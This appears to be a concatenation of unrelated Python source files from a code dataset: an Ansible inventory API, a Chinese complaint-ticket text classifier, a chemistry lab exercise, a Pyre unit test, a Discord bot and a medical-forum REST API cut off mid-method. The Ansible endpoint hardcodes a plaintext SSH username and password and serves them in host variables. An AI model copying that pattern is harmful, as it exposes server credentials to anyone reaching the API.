result2[\"core\"][\"data\"]\n\n # 转换成功则返回新数据,否则返回老数据。\n if make_text(data):\n result = result2\n\n resp = make_response(jsonify(result))\n resp.headers[\"Access-Control-Allow-Origin\"] = \"*\"\n return resp\n\n\ndef make_text(data):\n try:\n for d in data:\n if d.has_key(\"children\") and len(d.get(\"children\", None)):\n d[\"text\"] = '''{name}{num}'''.format(name=d[\"text\"], num=len(d[\"children\"]))\n make_text(d[\"children\"])\n return True\n except:\n return False\n\n@b_service_tree.route('/api/ansible/trees') #API获取公司名下的业务\ndef api_ansible_trees():\n '''通过星云服务树获取相应的ansible Inventory信息'''\n\n token = request.values.get(\"token\", \"\")\n if not token:\n return jsonify({\"code\":1, \"message\":\"Not Fund Token.\"})\n\n if token != conf.ANSIBLE_TOKEN:\n return jsonify({\"code\":1, \"message\":\"Token Fail.\"})\n\n # Init Class\n ops_machine = cmdb.OpsMachineInfo()\n\n company = request.values.get(\"company\", \"\")\n business = request.values.get(\"business\", \"\")\n project = request.values.get(\"project\", \"\")\n\n company_id = request.values.get(\"company_id\", \"\")\n business_id = request.values.get(\"business_id\", \"\")\n project_id = request.values.get(\"project_id\", \"\")\n\n if company: # 返回公司下所有\n if business: # 返回业务下所有\n if project: # 返回项目下所有\n data = ops_machine.select_rows_api(company_name=company,\n business_name=business,\n project_name=project)\n else:\n data = ops_machine.select_rows_api(company_name=company,\n business_name=business)\n else:\n data = ops_machine.select_rows_api(company_name=company)\n\n elif company_id: # 返回公司下所有\n if business_id: # 返回业务下所有\n if project_id: # 返回项目下所有\n data = ops_machine.select_rows_api(company_id=company_id,\n business_id=business_id,\n project_id=project_id)\n else:\n data = ops_machine.select_rows_api(company_id=company_id,\n business_id=business_id)\n else:\n data = ops_machine.select_rows_api(company_id=company_id)\n\n else:\n data = ops_machine.select_rows_api()\n\n result = {\n \"_meta\": {\n \"hostvars\": {}\n }\n }\n # {\n # \"databases\": {\n # \"hosts\": [\"host1.example.com\", \"host2.example.com\"],\n # \"vars\": {\n # \"a\": true\n # }\n # },\n # \"webservers\": [\"host2.example.com\", \"host3.example.com\"],\n # \"atlanta\": {\n # \"hosts\": [\"host1.example.com\", \"host4.example.com\", \"host5.example.com\"],\n # \"vars\": {\n # \"b\": false\n # },\n # \"children\": [\"marietta\", \"5points\"]\n # },\n # \"marietta\": [\"host6.example.com\"],\n # \"5points\": [\"host7.example.com\"]\n # }\n\n # 按照Ansible格式输出\n for project_name, project_id, company_name, company_id, \\\n business_name, business_id, ip, machine_name in data:\n ckey = 'c={0}'.format(company_name)\n bkey = 'b={0}={1}'.format(company_name, business_name)\n pkey = 'p={0}={1}={2}'.format(company_name, business_name, project_name)\n\n if ckey not in result: # init company_name\n result[ckey] = {\n \"vars\" : {\n \"company_name\" : company_name,\n \"company_id\" : company_id\n },\n \"children\" : [bkey, ]\n }\n else:\n if bkey not in result[ckey][\"children\"]:\n result[ckey][\"children\"].append(bkey)\n\n if bkey not in result:\n result[bkey] = {\n \"vars\": {\n \"parent_name\" : \"{0}\".format(company_name),\n \"parent_id\" : \"{0}\".format(company_id),\n\n },\n \"children\": [pkey, ]\n }\n else:\n if pkey not in result[bkey][\"children\"]:\n result[bkey][\"children\"].append(pkey)\n\n if pkey not in result:\n result[pkey] = {\n \"vars\": {\n \"parent_name\" : \"{0};{1}\".format(company_name, business_name),\n \"parent_id\" : \"{0};{1}\".format(company_id, business_id),\n },\n \"hosts\" : [ip, ]\n }\n else:\n result[pkey][\"hosts\"].append(ip)\n\n # 更新每个主机的变量,让其客户端缓存不调用--host来触发多个远程调用。\n result[\"_meta\"][\"hostvars\"][ip] = {\n \"ansible_host\": ip,\n \"ansible_port\": 22,\n \"ansible_ssh_pass\": \"windows2003\",\n \"ansible_user\": \"zuowenhong\",\n \"hostname\" : machine_name,\n \"company\" : company_name,\n \"business\" : business_name,\n \"project\" : project_name,\n \"company_id\" : company_id,\n \"business_id\" : business_id,\n \"project_id\" : project_id\n }\n\n return jsonify(result)\n","sub_path":"controllers/service_tree.py","file_name":"service_tree.py","file_ext":"py","file_size_in_byte":34121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"248001965","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 6 23:07:03 2020\n\n@author: Administrator\n\"\"\"\n\nfrom fastapi import FastAPI\nimport os\nimport jieba\nimport re\nimport numpy as np\nfrom sklearn.externals import joblib\nimport gensim\nfrom keras.models import load_model\nfrom keras.preprocessing import sequence\n\napp = FastAPI()\n\n\nwork_path = 'D:/2020年工作/2020年工单智能化项目/'\nos.chdir(work_path)\n\n# 载入tokenizer模型\ntoken = joblib.load('./token_file.pkl')\n\n# 载入分类字典\nwith open('./label_dict.txt', 'r') as f:\n label_dict = eval(f.read())\n\n# 读取模型\nmodel = load_model('./lstm_model_10_epochs_maxlen127.h5')\n\n#定义读取停词表的函数\ndef loadStopWords():\n stop = []\n for line in open('stopWord.txt').readlines():\n stop.append(line)\n return list(set(stop))\n\n\n#定义切词函数\ndef cutWords(msg,stopWords):\n jieba.load_userdict(\"userdict.txt\")\n arr_leftWords=[]\n seg_list = jieba.cut(msg,cut_all=False)\n leftWords=''\n for i in seg_list:#for i in y,y可以是列表、元组、字典、Series\n if (i not in stopWords):\n leftWords+=' '+i\n leftWords.strip()\n arr_leftWords.append(leftWords)\n return arr_leftWords\n\ndef replace_spcial(msg):\n msg = msg.replace('
','')\n msg = msg.replace('','')\n msg = msg.replace('','')\n msg = msg.replace('->','')\n return msg\n\ndef pred_class(msg):\n msg = msg.translate(symbol_map)\n msg = replace_spcial(msg)\n msg = re.sub('\\d','',msg)\n\n stopWords = loadStopWords()\n X_cut = cutWords(msg,stopWords) # 分词\n xtest_seq = token.texts_to_sequences(X_cut) #\n\n max_len = 127\n xtest_pad = sequence.pad_sequences(xtest_seq, maxlen=max_len)\n\n # 预测\n y_pred_prob = model.predict(xtest_pad, verbose=0)[0]\n y_pred_list = y_pred_prob.tolist()\n y_pred_class = y_pred_list.index(max(y_pred_list))\n return y_pred_class\n\n\nsymbol_map = {\n ord('\\n') : None,\n ord('\\t') : None,\n ord('\\r') : None,\n ord('①') : None,\n ord('②') : None,\n ord('③') : None,\n ord('④') : None,\n ord('【') : None,\n ord('】') : None,\n ord('(') : None,\n ord(')') : None,\n ord('(') : None,\n ord(')') : None,\n ord(':') : None,\n ord(':') : None,\n ord('-') : None,\n ord(';') : None,\n ord(';') : None,\n ord(',') : None,\n ord(',') : None,\n ord('。') : None,\n ord('.') : None,\n ord('、') : None,\n ord('-') : None,\n ord('—') : None,\n ord('/') : None,\n}\n\n\nmsg1 = '''\n1.投诉原因:用户因携号转网用户无法正常使用 引发用户投诉\n2.核实情况:查HLR数据正常,查询AN-AAA正常、AAA正常\n3.处理结果:查看移动未反馈,我方已催促移动处理。\n4.回复用户情况:(录音流水号1901050000179166)12132回复用户认可、无异议\n5. 说明备注:;


回访信息
总体情况:满意; 处理态度:满意; 处理及时性:满意; 处理结果:满意;

结果说明
问题产生原因:;

采取措施:;

原因分类:移动业务->终端及卡->用户端原因->用户自备设备或终端问题;

处理结果
责任定性:企业原因;

考核原因:;

责任部门:市场部【64】;

CRM流水号(操作):99999999999999;

备注:\n'''\nmsg1_class = 72\n\nmsg2 = '''\n①投诉原因:因有信号无法正常使用引发用户的投诉\n②核实情况:根据用户诉求查询AN-AAA正常、AAA正常,HLR状态正常\n③处理结果:投诉原因:市电停电,富宁里达共移动基站目前已经恢复正常,联系用户,用户不在投诉区域,建议用户返还投诉区域后使用观察,用户表示认可\n④回复用户情况:(录音流水号 1901050000212832 )12947回复用户认可、无异议\n⑤说明备注:无;


回访信息
总体情况:满意; 处理态度:满意; 处理及时性:满意; 处理结果:满意;

结果说明
问题产生原因:;

采取措施:;

原因分类:移动业务->移动语音网络->无线网络原因->基站故障->基站设备故障;

处理结果
责任定性:企业原因;

考核原因:;

责任部门:文山分公司【876】;

CRM流水号(操作):99999999999999;

备注:\n'''\nmsg2_class = 23\n\n\nmsg3 = '''\n1.投诉原因:用户因网速慢 引发用户投诉\n2.核实情况:查HLR数据正常,查询AN-AAA正常、AAA正常\n3.处理结果:经核实,分公司投诉处理员16613联系用户核实使用情况,男机主本人接听 ,用户反映在腾冲天诚商业街使用,有4G网络,但网速慢,离开该区域未好转,经网络部核实该区域基站信号正常。投诉处理员16613联系用户解释,请用至营业厅检查终端或更换UIM卡,用户对处理结果认可。\n4.回复用户情况:(录音流水号1901040000416164 )分公司已经联系用户解释\n5. 说明备注:;


回访信息
总体情况:满意; 处理态度:满意; 处理及时性:满意; 处理结果:满意;

结果说明
问题产生原因:;

采取措施:;

原���分类:移动业务->终端及卡->用户端原因->用户自备设备或终端问题;

处理结果
责任定性:用户原因;

考核原因:;

责任部门:;

CRM流水号(操作):99999999999999;

备注:经核实,分公司投诉处理员16613联系用户核实使用情况,男机主本人接听 ,用户反映在腾冲天诚商业街使用,有4G网络,但网速慢,离开该区域未好转,经网络部核实该区域基站信号正常。投诉处理员16613联系用户解释,请用至营业厅检查终端或更换UIM卡,用户对处理结果认可\n'''\nmsg3_class = 54\n\n\n\n@app.get(\"/classify\")\nasync def read_msg(content: str, clas:int = None):\n y_pred = pred_class(content)\n class_text = label_dict.get(y_pred)\n return {\"pred\": y_pred, \"text\": class_text, \"class\": clas}\n","sub_path":"fast_api/fast_api_text_classify.py","file_name":"fast_api_text_classify.py","file_ext":"py","file_size_in_byte":6384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"264129584","text":"def minmp(filename, compound_formula):\n \"\"\"(str, str) -> (str, int)\n When passed a filename with a listing of elements and properties and a compound_formula. Returns a tuple where the first element is the lowest melting point element in the compound and the second element is it's corresponding melting point.\n >>>minmp(\"elements.txt\", \"K1Fe4\")\n 'K', 336\n >>>minmp(\"elements.txt\", \"Fe6Cr1\")\n 'Fe', 1811\n \"\"\"\n #open the file, take out the content\n myfile = open(filename,'r')\n content = myfile.read()\n elements = []\n Melting_point= []\n dictionary_with_melt={}\n for i in range(len(content)):\n if content[i-1] == '\\n' :\n for tab in range(3):\n if content[i+tab] == '\\t' :\n elements.append(content[i:i+tab])\n if content[i-1] == '\\t' :\n for sec_tab in range(5):\n if content[i+sec_tab] == '\\t' :\n Melting_point.append(int(content[i:i+sec_tab])) \n for e in range(len(elements)):\n dictionary_with_melt[elements[e]] = Melting_point[e]\n \n input_compound = list(molform(compound_formula).keys())\n result = []\n result_melt_point=[]\n for test_element in input_compound:\n if test_element in dictionary_with_melt:\n result.append(test_element)\n result_melt_point.append(dictionary_with_melt[test_element])\n if test_element not in dictionary_with_melt:\n continue\n for num in range(len(result)):\n if result_melt_point[num] == min(result_melt_point):\n return result[num],result_melt_point[num]\n myfile.close() \n #for i in range(len(content)):\n #if content[i] = '/n':\n #print('hi')\n \n #transfer the content into a dictionary\n \n #find the elements involved\n #compare the different melting point\n \n \ndef molform(compound_formula):\n \"\"\"(str) -> dictionary\n When passed a string of the compound formula, returns a dictionary with a string of the element symbol as the key and the number of atoms of that element as the value.\n >>>molform(\"C2H6O1\")\n {'C':2, 'H':6, 'O':1}\n >>>molfor(\"C1H4\")\n {'C':1, 'H':4}\n \"\"\"\n dictionary= {}\n elements = []\n digits = []\n for i in range(len(compound_formula)-1):\n if compound_formula[i].isalpha():\n \n element = ''\n \n element += compound_formula[i]\n \n if compound_formula[i+1].isalpha():\n \n element += compound_formula[i+1]\n elements.append(element) \n \n if compound_formula[i].isdigit():\n if not (compound_formula[i-1].isdigit()) and not (compound_formula[i+1].isdigit()):\n digit = ''\n digit += compound_formula[i]\n digits.append(int(digit))\n if compound_formula[i+1].isdigit():\n digit = compound_formula[i]\n digit += compound_formula[i+1]\n digits.append(int(digit))\n if compound_formula[-1].isdigit():\n digits.append(int(compound_formula[-1]))\n elements1 = tuple(elements)\n for e in range(len(elements1)-1):\n for element in (elements1[:e]+elements1[e+1:]):\n if element.isupper():\n continue\n if element in elements1[e]:\n if not element in elements:\n break\n elements.remove(element)\n for j in range(len(elements)):\n dictionary[elements[j]]= digits[j]\n \n return dictionary\n \n ","sub_path":"lab6.py","file_name":"lab6.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508479594","text":"# Copyright (c) 2016-present, Facebook, Inc.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport unittest\nfrom unittest.mock import MagicMock, patch\n\nfrom ... import commands\nfrom ...analysis_directory import AnalysisDirectory\nfrom ...json_rpc import read_response\nfrom ...socket_connection import SocketConnection\nfrom .command_test import mock_arguments, mock_configuration\n\n\nclass QueryTest(unittest.TestCase):\n def test_query(self) -> None:\n original_directory = \"/original/directory\"\n arguments = mock_arguments()\n arguments.query = \"\"\n configuration = mock_configuration()\n\n with patch.object(SocketConnection, \"connect\") as connect:\n result = MagicMock()\n result.output = \"{}\"\n read_response.return_value = result\n\n commands.Query(\n arguments, original_directory, configuration, AnalysisDirectory(\".\")\n ).run()\n connect.assert_called_once()\n\n arguments.log_directory = \"/tmp/foo\"\n arguments.query = \"query\"\n self.assertEqual(\n commands.Query(\n arguments, original_directory, configuration, AnalysisDirectory(\".\")\n )._flags(),\n [\"query\", \"-log-directory\", \"/tmp/foo\"],\n )\n\n def test_rewrite_paths(self) -> None:\n original_directory = \"/original/directory\"\n arguments = mock_arguments()\n configuration = mock_configuration()\n analysis_directory = MagicMock()\n arguments.query = \"\"\n analysis_directory.compute_symbolic_links.return_value = {\n \"/root/a.py\": \"/shared/a.py\",\n \"/root/b.py\": \"/shared/b.py\",\n }\n query = commands.Query(\n arguments, original_directory, configuration, analysis_directory\n )\n self.assertEqual(\n query._rewrite_paths(\"run_check('awaitable', '/root/a.py')\"),\n \"run_check('awaitable', '/shared/a.py')\",\n )\n self.assertEqual(\n query._rewrite_paths(\"run_check('awaitable', '/root/b.py')\"),\n \"run_check('awaitable', '/shared/b.py')\",\n )\n self.assertEqual(\n query._rewrite_paths(\"run_check('awaitable', 'other/root/b.py')\"),\n \"run_check('awaitable', 'other/root/b.py')\",\n )\n self.assertEqual(\n query._rewrite_paths(\"run_check('awaitable', '/root/b.py/suffix')\"),\n \"run_check('awaitable', '/root/b.py/suffix')\",\n )\n # We don't parse anything when rewriting paths.\n self.assertEqual(\n query._rewrite_paths(\"'/root/b.py'run_check('awaitable', '/root/a.py')\"),\n \"'/shared/b.py'run_check('awaitable', '/shared/a.py')\",\n )\n","sub_path":"client/commands/tests/query_test.py","file_name":"query_test.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"59938867","text":"import sys\nimport copy\n\nimport discord\nimport asyncio\n\nimport importlib\n\nimport message_handler as mh\n\n\nclient = discord.Client()\n\n\ntry:\n\timport json\n\n\twith open(\"config.json\") as config:\n\t\t\tconfig = json.load(config)\n\n\ttoken \t\t\t\t= config['token']\n\tbotname\t\t\t\t= config['botname']\n\tplaygame\t\t\t= config['playgame']\n\n\tbot_prefixes \t\t= config['bot_prefixes']\n\tbot_short_commands \t= config['bot_short_commands']\n\topt_commands \t\t= config['opt_commands']\n\n\t_globals = mh.getGlobals()\n\t_globals.update(globals())\n\n\t#switch-case\n\t#keys - startwith of message\n\t#values - functions from message_handler.py\n\tswitcher = {}\n\tfor key, value in config['switcher'].items():\n\t\tswitcher[key] = _globals[value]\n\n\nexcept:\n\tprint(\"Config file not found!\")\n\tsys.exit()\n\n\n\n@client.event\nasync def on_ready():\n\tprint(\"{} is ready!\".format(botname))\n\tprint(\"Name: {}\".format(client.user.name))\n\tprint(\"ID: {}\".format(client.user.id))\n\tprint(\"---------------------------------\")\n\n\tawait client.change_presence(game = discord.Game(name = playgame))\n\n\n@client.event\nasync def on_message(message):\n\t\n\tprint('\\n')\n\tprint('Message info:')\n\tprint('---------------------------------')\n\tprint('author: {}'.format(message.author))\n\tprint('id: {}'.format(message.author.id))\n\tprint('server: {}'.format(message.server))\n\tprint('channel: {}'.format(message.channel))\n\tprint('content: {}'.format(message.content))\n\n\ttry:\n\t\tind = 1\n\t\tfor emb in message.embeds:\n\t\t\tprint('emb{} description: {}'.format(ind, emb['description']))\t\n\texcept:\n\t\tpass\n\t\n\tprint('---------------------------------')\n\tprint('\\n')\n\n\t#bot found the commands in message\n\tif any(message.content.lower().startswith(prefix) for prefix in bot_prefixes):\n\t\tawait start_handler(message)\n\tif any(message.content.lower().startswith(cmd) for cmd in bot_short_commands):\n\t\tawait start_handler(message, short = True)\n\t\n\n#Start message_handler\nasync def start_handler(message, short = False):\n\n\t#Calling func from switcher\n\n\t#using command with bot_prefix\n\tif short == False:\n\t\tmess_startwith = message.content.lower().split()\n\t\tif len(mess_startwith) > 1 and mess_startwith[1] in switcher:\n\t\t\tmessage_without_cmd = del_cmd_from_message_content(message, short)\n\t\t\tawait switcher[mess_startwith[1]](client, message_without_cmd)\n\t\t\t\n\t#using short command without bot_prefix\n\tif short == True:\n\t\tmess_startwith = message.content.lower().split()\n\t\tif len(mess_startwith) > 0 and mess_startwith[0] in switcher:\n\t\t\tmessage_without_cmd = del_cmd_from_message_content(message, short)\n\t\t\t\n\t\t\t\n\t\t\t#Call funcs with Special Arguments\n\n\t\t\t#mh.quote_multiline\n\t\t\tif switcher[mess_startwith[0]] == mh.quote_multiline:\n\t\t\t\tawait switcher[mess_startwith[0]](client, message_without_cmd, opt_commands)\t\n\t\t\t\treturn\n\t\t\t\n\t\t\t#else\n\t\t\tawait switcher[mess_startwith[0]](client, message_without_cmd)\n\n\n#Delete in message.content command and return message without one\ndef del_cmd_from_message_content(message, short = True):\n\n\tlines = message.content.split('\\n')\n\t\n\tif short == False:\n\t\tlines[0] = \" \".join(lines[0].split()[2:])\n\tif short == True:\n\t\tlines[0] = \" \".join(lines[0].split()[1:])\n\t\n\tcontent = \"\\n\".join(lines)\n\n\tmessage.content = content\n\t#print('content: {}'.format(content))\n\n\treturn message\n\t\n\nclient.run(token)\n\n","sub_path":"botstart.py","file_name":"botstart.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"554229183","text":"expr=str(input('Digite a expressao:'))\npilha=[]\nfor simb in expr:\n if simb=='(':\n pilha.append('(')\n elif simb==')':\n if len(pilha)>0:\n pilha.pop()\n else:\n pilha.append(')')\n break\n \nif len(pilha)==0:\n print('Sua expressão está correta')\nelse:\n print('Sua expressão não está correta')\n ","sub_path":"Python/LT/validandoexpressoes.py","file_name":"validandoexpressoes.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"68327065","text":"\"\"\"\r\nDiagnosis and Diagnoses resource API implementation\r\n\"\"\"\r\n\r\nimport json\r\nfrom flask import request, Response, g\r\nfrom flask_restful import Resource, abort\r\nfrom .resources import API, hyper_const\r\nfrom . import forum_object as forum_obj\r\nfrom .error_handlers import create_error_response\r\nfrom . import user_resources as user_res\r\n\r\n\r\nclass Diagnoses(Resource):\r\n \"\"\"\r\n Resource Diagnoses implementation\r\n \"\"\"\r\n\r\n def get(self):\r\n \"\"\"\r\n Get all diagnoses.\r\n\r\n INPUT parameters:\r\n None\r\n\r\n RESPONSE ENTITY BODY:\r\n * Media type: Mason\r\n https://github.com/JornWildt/Mason\r\n * Profile: Forum_Diagnosis\r\n /profiles/diagnosis_profile\r\n\r\n NOTE:\r\n * The attribute disease is obtained from the column diagnoses.disease\r\n * The attribute diagnosis is obtained from the column diagnoses.diagnosis_description\r\n * The attribute message_id is obtained from the column diagnoses.message_id\r\n * The attribute user_id is obtained from the column diagnoses.user_id\r\n \"\"\"\r\n\r\n diagnoses_db = g.con.get_diagnoses()\r\n\r\n envelope = forum_obj.ForumObject()\r\n envelope.add_namespace(\"medical_forum\", hyper_const.LINK_RELATIONS_URL)\r\n\r\n envelope.add_control(\"self\", href=API.url_for(Diagnoses))\r\n envelope.add_control_users_all()\r\n envelope.add_control_add_diagnosis()\r\n items = envelope[\"items\"] = []\r\n\r\n for dgs in diagnoses_db:\r\n item = forum_obj.ForumObject(\r\n id=dgs[\"diagnosis_id\"], disease=dgs[\"disease\"])\r\n item.add_control(\"self\", href=API.url_for(\r\n Diagnosis, diagnosis_id=dgs[\"diagnosis_id\"]))\r\n item.add_control(\r\n \"profile\", href=hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n items.append(item)\r\n\r\n return Response(json.dumps(envelope), 200, mimetype=hyper_const.MASON + \";\" +\r\n hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n\r\n def post(self):\r\n \"\"\"\r\n Adds a a new diagnosis.\r\n\r\n REQUEST ENTITY BODY:\r\n * Media type: JSON:\r\n * Profile: Forum_Diagnosis\r\n /profiles/diagnosis_profile\r\n\r\n NOTE:\r\n * The attribute disease is obtained from the column diagnoses.disease\r\n * The attribute diagnosis_description is obtained from the column\r\n * diagnoses.diagnosis_description\r\n * The attribute message_id is obtained from the column diagnoses.message_id\r\n * The attribute user_id is obtained from the column diagnoses.user_id\r\n\r\n The body should be a JSON document that matches the schema for new diagnoses\r\n\r\n RESPONSE STATUS CODE:\r\n * Returns 201 if the diagnosis has been added correctly.\r\n The Location header contains the path of the new diagnosis\r\n * Returns 400 if the diagnosis is not well formed or the entity body is\r\n empty.\r\n * Returns 415 if the format of the response is not json\r\n * Returns 500 if the diagnosis could not be added to database.\r\n\r\n \"\"\"\r\n\r\n # Extract the request body. In general would be request.data\r\n # Since the request is JSON I use request.get_json\r\n # get_json returns a python dictionary after serializing the request body\r\n # get_json returns None if the body of the request is not formatted\r\n # using JSON. We use force=True since the input media type is not\r\n # application/json.\r\n\r\n if hyper_const.JSON != request.headers.get(\"Content-Type\", \"\"):\r\n return create_error_response(\r\n 415, \"UnsupportedMediaType\", \"Use a JSON compatible format\")\r\n request_body = request.get_json(force=True)\r\n\r\n try:\r\n disease = request_body[\"disease\"]\r\n diagnosis_description = request_body[\"diagnosis_description\"]\r\n message_id = request_body.get(\"message_id\")\r\n user_id = request_body.get(\"user_id\")\r\n\r\n except KeyError:\r\n return create_error_response(\r\n 400, \"Wrong request format\",\r\n \"Be sure you include diagnosis and disease and a valid user_id\")\r\n\r\n user_id = int(user_id)\r\n message_id = 'msg-' + message_id\r\n diagnosis = {'user_id': user_id,\r\n 'message_id': message_id,\r\n 'disease': disease,\r\n 'diagnosis_description': diagnosis_description}\r\n try:\r\n new_diagnosis_id = g.con.create_diagnosis(diagnosis)\r\n except ValueError:\r\n return create_error_response(\r\n 400, \"Request by non-doctor user\", \"Only doctors can add a diagnosis\")\r\n\r\n if not new_diagnosis_id:\r\n return create_error_response(\r\n 500, \"Problem with the database\", \"Cannot access the database\")\r\n\r\n url = API.url_for(Diagnosis, diagnosis_id=new_diagnosis_id)\r\n return Response(status=201, headers={\"Location\": url})\r\n\r\n\r\nclass DiagnosesHistory(Resource):\r\n \"\"\"\r\n Resource Diagnoses implementation\r\n \"\"\"\r\n\r\n def get(self, user_id=None):\r\n \"\"\"\r\n Get all diagnoses.\r\n\r\n INPUT parameters:\r\n None\r\n\r\n RESPONSE ENTITY BODY:\r\n * Media type: Mason\r\n https://github.com/JornWildt/Mason\r\n * Profile: Forum_Diagnosis\r\n /profiles/diagnosis_profile\r\n\r\n NOTE:\r\n * The attribute disease is obtained from the column diagnoses.disease\r\n * The attribute diagnosis is obtained from the column diagnoses.diagnosis_description\r\n * The attribute message_id is obtained from the column diagnoses.message_id\r\n * The attribute user_id is obtained from the column diagnoses.user_id\r\n \"\"\"\r\n\r\n diagnoses_db = g.con.get_diagnoses(user_id=user_id)\r\n envelope = forum_obj.ForumObject()\r\n envelope.add_namespace(\"medical_forum\", hyper_const.LINK_RELATIONS_URL)\r\n\r\n envelope.add_control(\"self\", href=API.url_for(Diagnoses))\r\n envelope.add_control_users_all()\r\n envelope.add_control_add_diagnosis()\r\n items = envelope[\"items\"] = []\r\n\r\n for dgs in diagnoses_db:\r\n item = forum_obj.ForumObject(\r\n id=dgs[\"diagnosis_id\"], disease=dgs[\"disease\"])\r\n item.add_control(\"self\", href=API.url_for(\r\n Diagnosis, diagnosis_id=dgs[\"diagnosis_id\"]))\r\n item.add_control(\r\n \"profile\", href=hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n items.append(item)\r\n\r\n return Response(json.dumps(envelope), 200, mimetype=hyper_const.MASON + \";\" +\r\n hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n\r\n\r\nclass DiagnosesHistoryMessage(Resource):\r\n \"\"\"\r\n Resource Diagnoses implementation\r\n \"\"\"\r\n\r\n def get(self, message_id=None):\r\n \"\"\"\r\n Get all diagnoses.\r\n\r\n INPUT parameters:\r\n None\r\n\r\n RESPONSE ENTITY BODY:\r\n * Media type: Mason\r\n https://github.com/JornWildt/Mason\r\n * Profile: Forum_Diagnosis\r\n /profiles/diagnosis_profile\r\n\r\n NOTE:\r\n * The attribute disease is obtained from the column diagnoses.disease\r\n * The attribute diagnosis is obtained from the column diagnoses.diagnosis_description\r\n * The attribute message_id is obtained from the column diagnoses.message_id\r\n * The attribute user_id is obtained from the column diagnoses.user_id\r\n \"\"\"\r\n\r\n diagnoses_db = g.con.get_diagnoses(message_id=message_id)\r\n envelope = forum_obj.ForumObject()\r\n envelope.add_namespace(\"medical_forum\", hyper_const.LINK_RELATIONS_URL)\r\n\r\n envelope.add_control(\"self\", href=API.url_for(Diagnoses))\r\n envelope.add_control_users_all()\r\n envelope.add_control_add_diagnosis()\r\n items = envelope[\"items\"] = []\r\n\r\n for dgs in diagnoses_db:\r\n item = forum_obj.ForumObject(\r\n id=dgs[\"diagnosis_id\"], disease=dgs[\"disease\"])\r\n item.add_control(\"self\", href=API.url_for(\r\n Diagnosis, diagnosis_id=dgs[\"diagnosis_id\"]))\r\n item.add_control(\r\n \"profile\", href=hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n items.append(item)\r\n\r\n return Response(json.dumps(envelope), 200, mimetype=hyper_const.MASON + \";\" +\r\n hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n\r\n\r\nclass Diagnosis(Resource):\r\n \"\"\"\r\n Resource that represents a single diagnosis in the API.\r\n \"\"\"\r\n\r\n def get(self, diagnosis_id):\r\n \"\"\"\r\n Get the disease, the diagnosis and the id of a specific diagnosis and its message id.\r\n\r\n Returns status code 404 if the diagnosis_id does not exist in the database.\r\n\r\n INPUT PARAMETER\r\n : param str diagnosis_id: The id of the diagnosis to be retrieved from the\r\n system\r\n\r\n RESPONSE ENTITY BODY:\r\n * Media type: application/vnd.mason+json:\r\n https://github.com/JornWildt/Mason\r\n * Profile: Forum_Diagnosis\r\n /profiles/diagnosis-profile\r\n\r\n Link relations used: self, collection, user_id,\r\n # NOTE, and reply?\r\n\r\n Semantic descriptors used: diagnosis, disease\r\n return None.\r\n\r\n RESPONSE STATUS CODE\r\n * Return status code 200 if everything OK.\r\n * Return status code 404 if the diagnosis was not found in the database.\r\n\r\n NOTE:\r\n * The attribute disease is obtained from the column diagnoses.disease\r\n * The attribute diagnosis is obtained from the column diagnoses.diagnosis_description\r\n * The attribute message_id is obtained from the column diagnoses.message_id\r\n * The attribute user_id is obtained from the column diagnoses.user_id\r\n \"\"\"\r\n\r\n diagnosis_db = g.con.get_diagnosis(diagnosis_id)\r\n if not diagnosis_db:\r\n abort(404, diagnosis=\"There is no a diagnosis with id %s\" % diagnosis_id,\r\n resource_type=\"Diagnosis\",\r\n resource_url=request.path,\r\n resource_id=diagnosis_id)\r\n\r\n user_id = diagnosis_db.get(\"user_id\")\r\n message_id = diagnosis_db.get(\"message_id\")\r\n\r\n envelope = forum_obj.ForumObject(\r\n disease=diagnosis_db[\"disease\"],\r\n diagnosis_description=diagnosis_db[\"diagnosis_description\"],\r\n user_id=user_id,\r\n message_id=message_id\r\n )\r\n\r\n envelope.add_namespace(\"medical_forum\", hyper_const.LINK_RELATIONS_URL)\r\n envelope.add_namespace(\"atom-thread\", hyper_const.ATOM_THREAD_PROFILE)\r\n\r\n envelope.add_control_reply_to(diagnosis_id)\r\n envelope.add_control(\r\n \"profile\", href=hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n envelope.add_control(\"collection\", href=API.url_for(Diagnoses))\r\n envelope.add_control(\"self\", href=API.url_for(\r\n Diagnosis, diagnosis_id=diagnosis_id))\r\n envelope.add_control(\r\n \"user_id\", href=API.url_for(user_res.User, username=user_id))\r\n\r\n envelope.add_control(\"atom-thread:in-reply-to\", href=None)\r\n return Response(json.dumps(envelope), 200, mimetype=hyper_const.MASON + \";\" +\r\n hyper_const.FORUM_DIAGNOSIS_PROFILE)\r\n\r\n def put(self, diagnosis_id):\r\n \"\"\"\r\n Modifies the disease and description of the diagnosis.\r\n \"\"\"\r\n\r\n if not g.con.contains_diagnosis(diagnosis_id):\r\n return create_error_response(404, \"Diagnosis not found\",\r\n \"There is no a diagnosis with id %s\" % diagnosis_id)\r\n\r\n if hyper_const.JSON != request.headers.get(\"Content-Type\", \"\"):\r\n return create_error_response(415, \"UnsupportedMediaType\",\r\n \"Use a JSON compatible format\")\r\n request_body = request.get_json(force=True)\r\n\r\n try:\r\n disease = request_body[\"disease\"]\r\n diagnosis_description = request_body[\"diagnosis_description\"]\r\n\r\n except KeyError:\r\n return create_error_response(400, \"Wrong request format\",\r\n \"Be sure you include message title and body\")\r\n else:\r\n if not g.con.modify_diagnosis(diagnosis_id, disease, diagnosis_description):\r\n return create_error_response(\r\n 500, 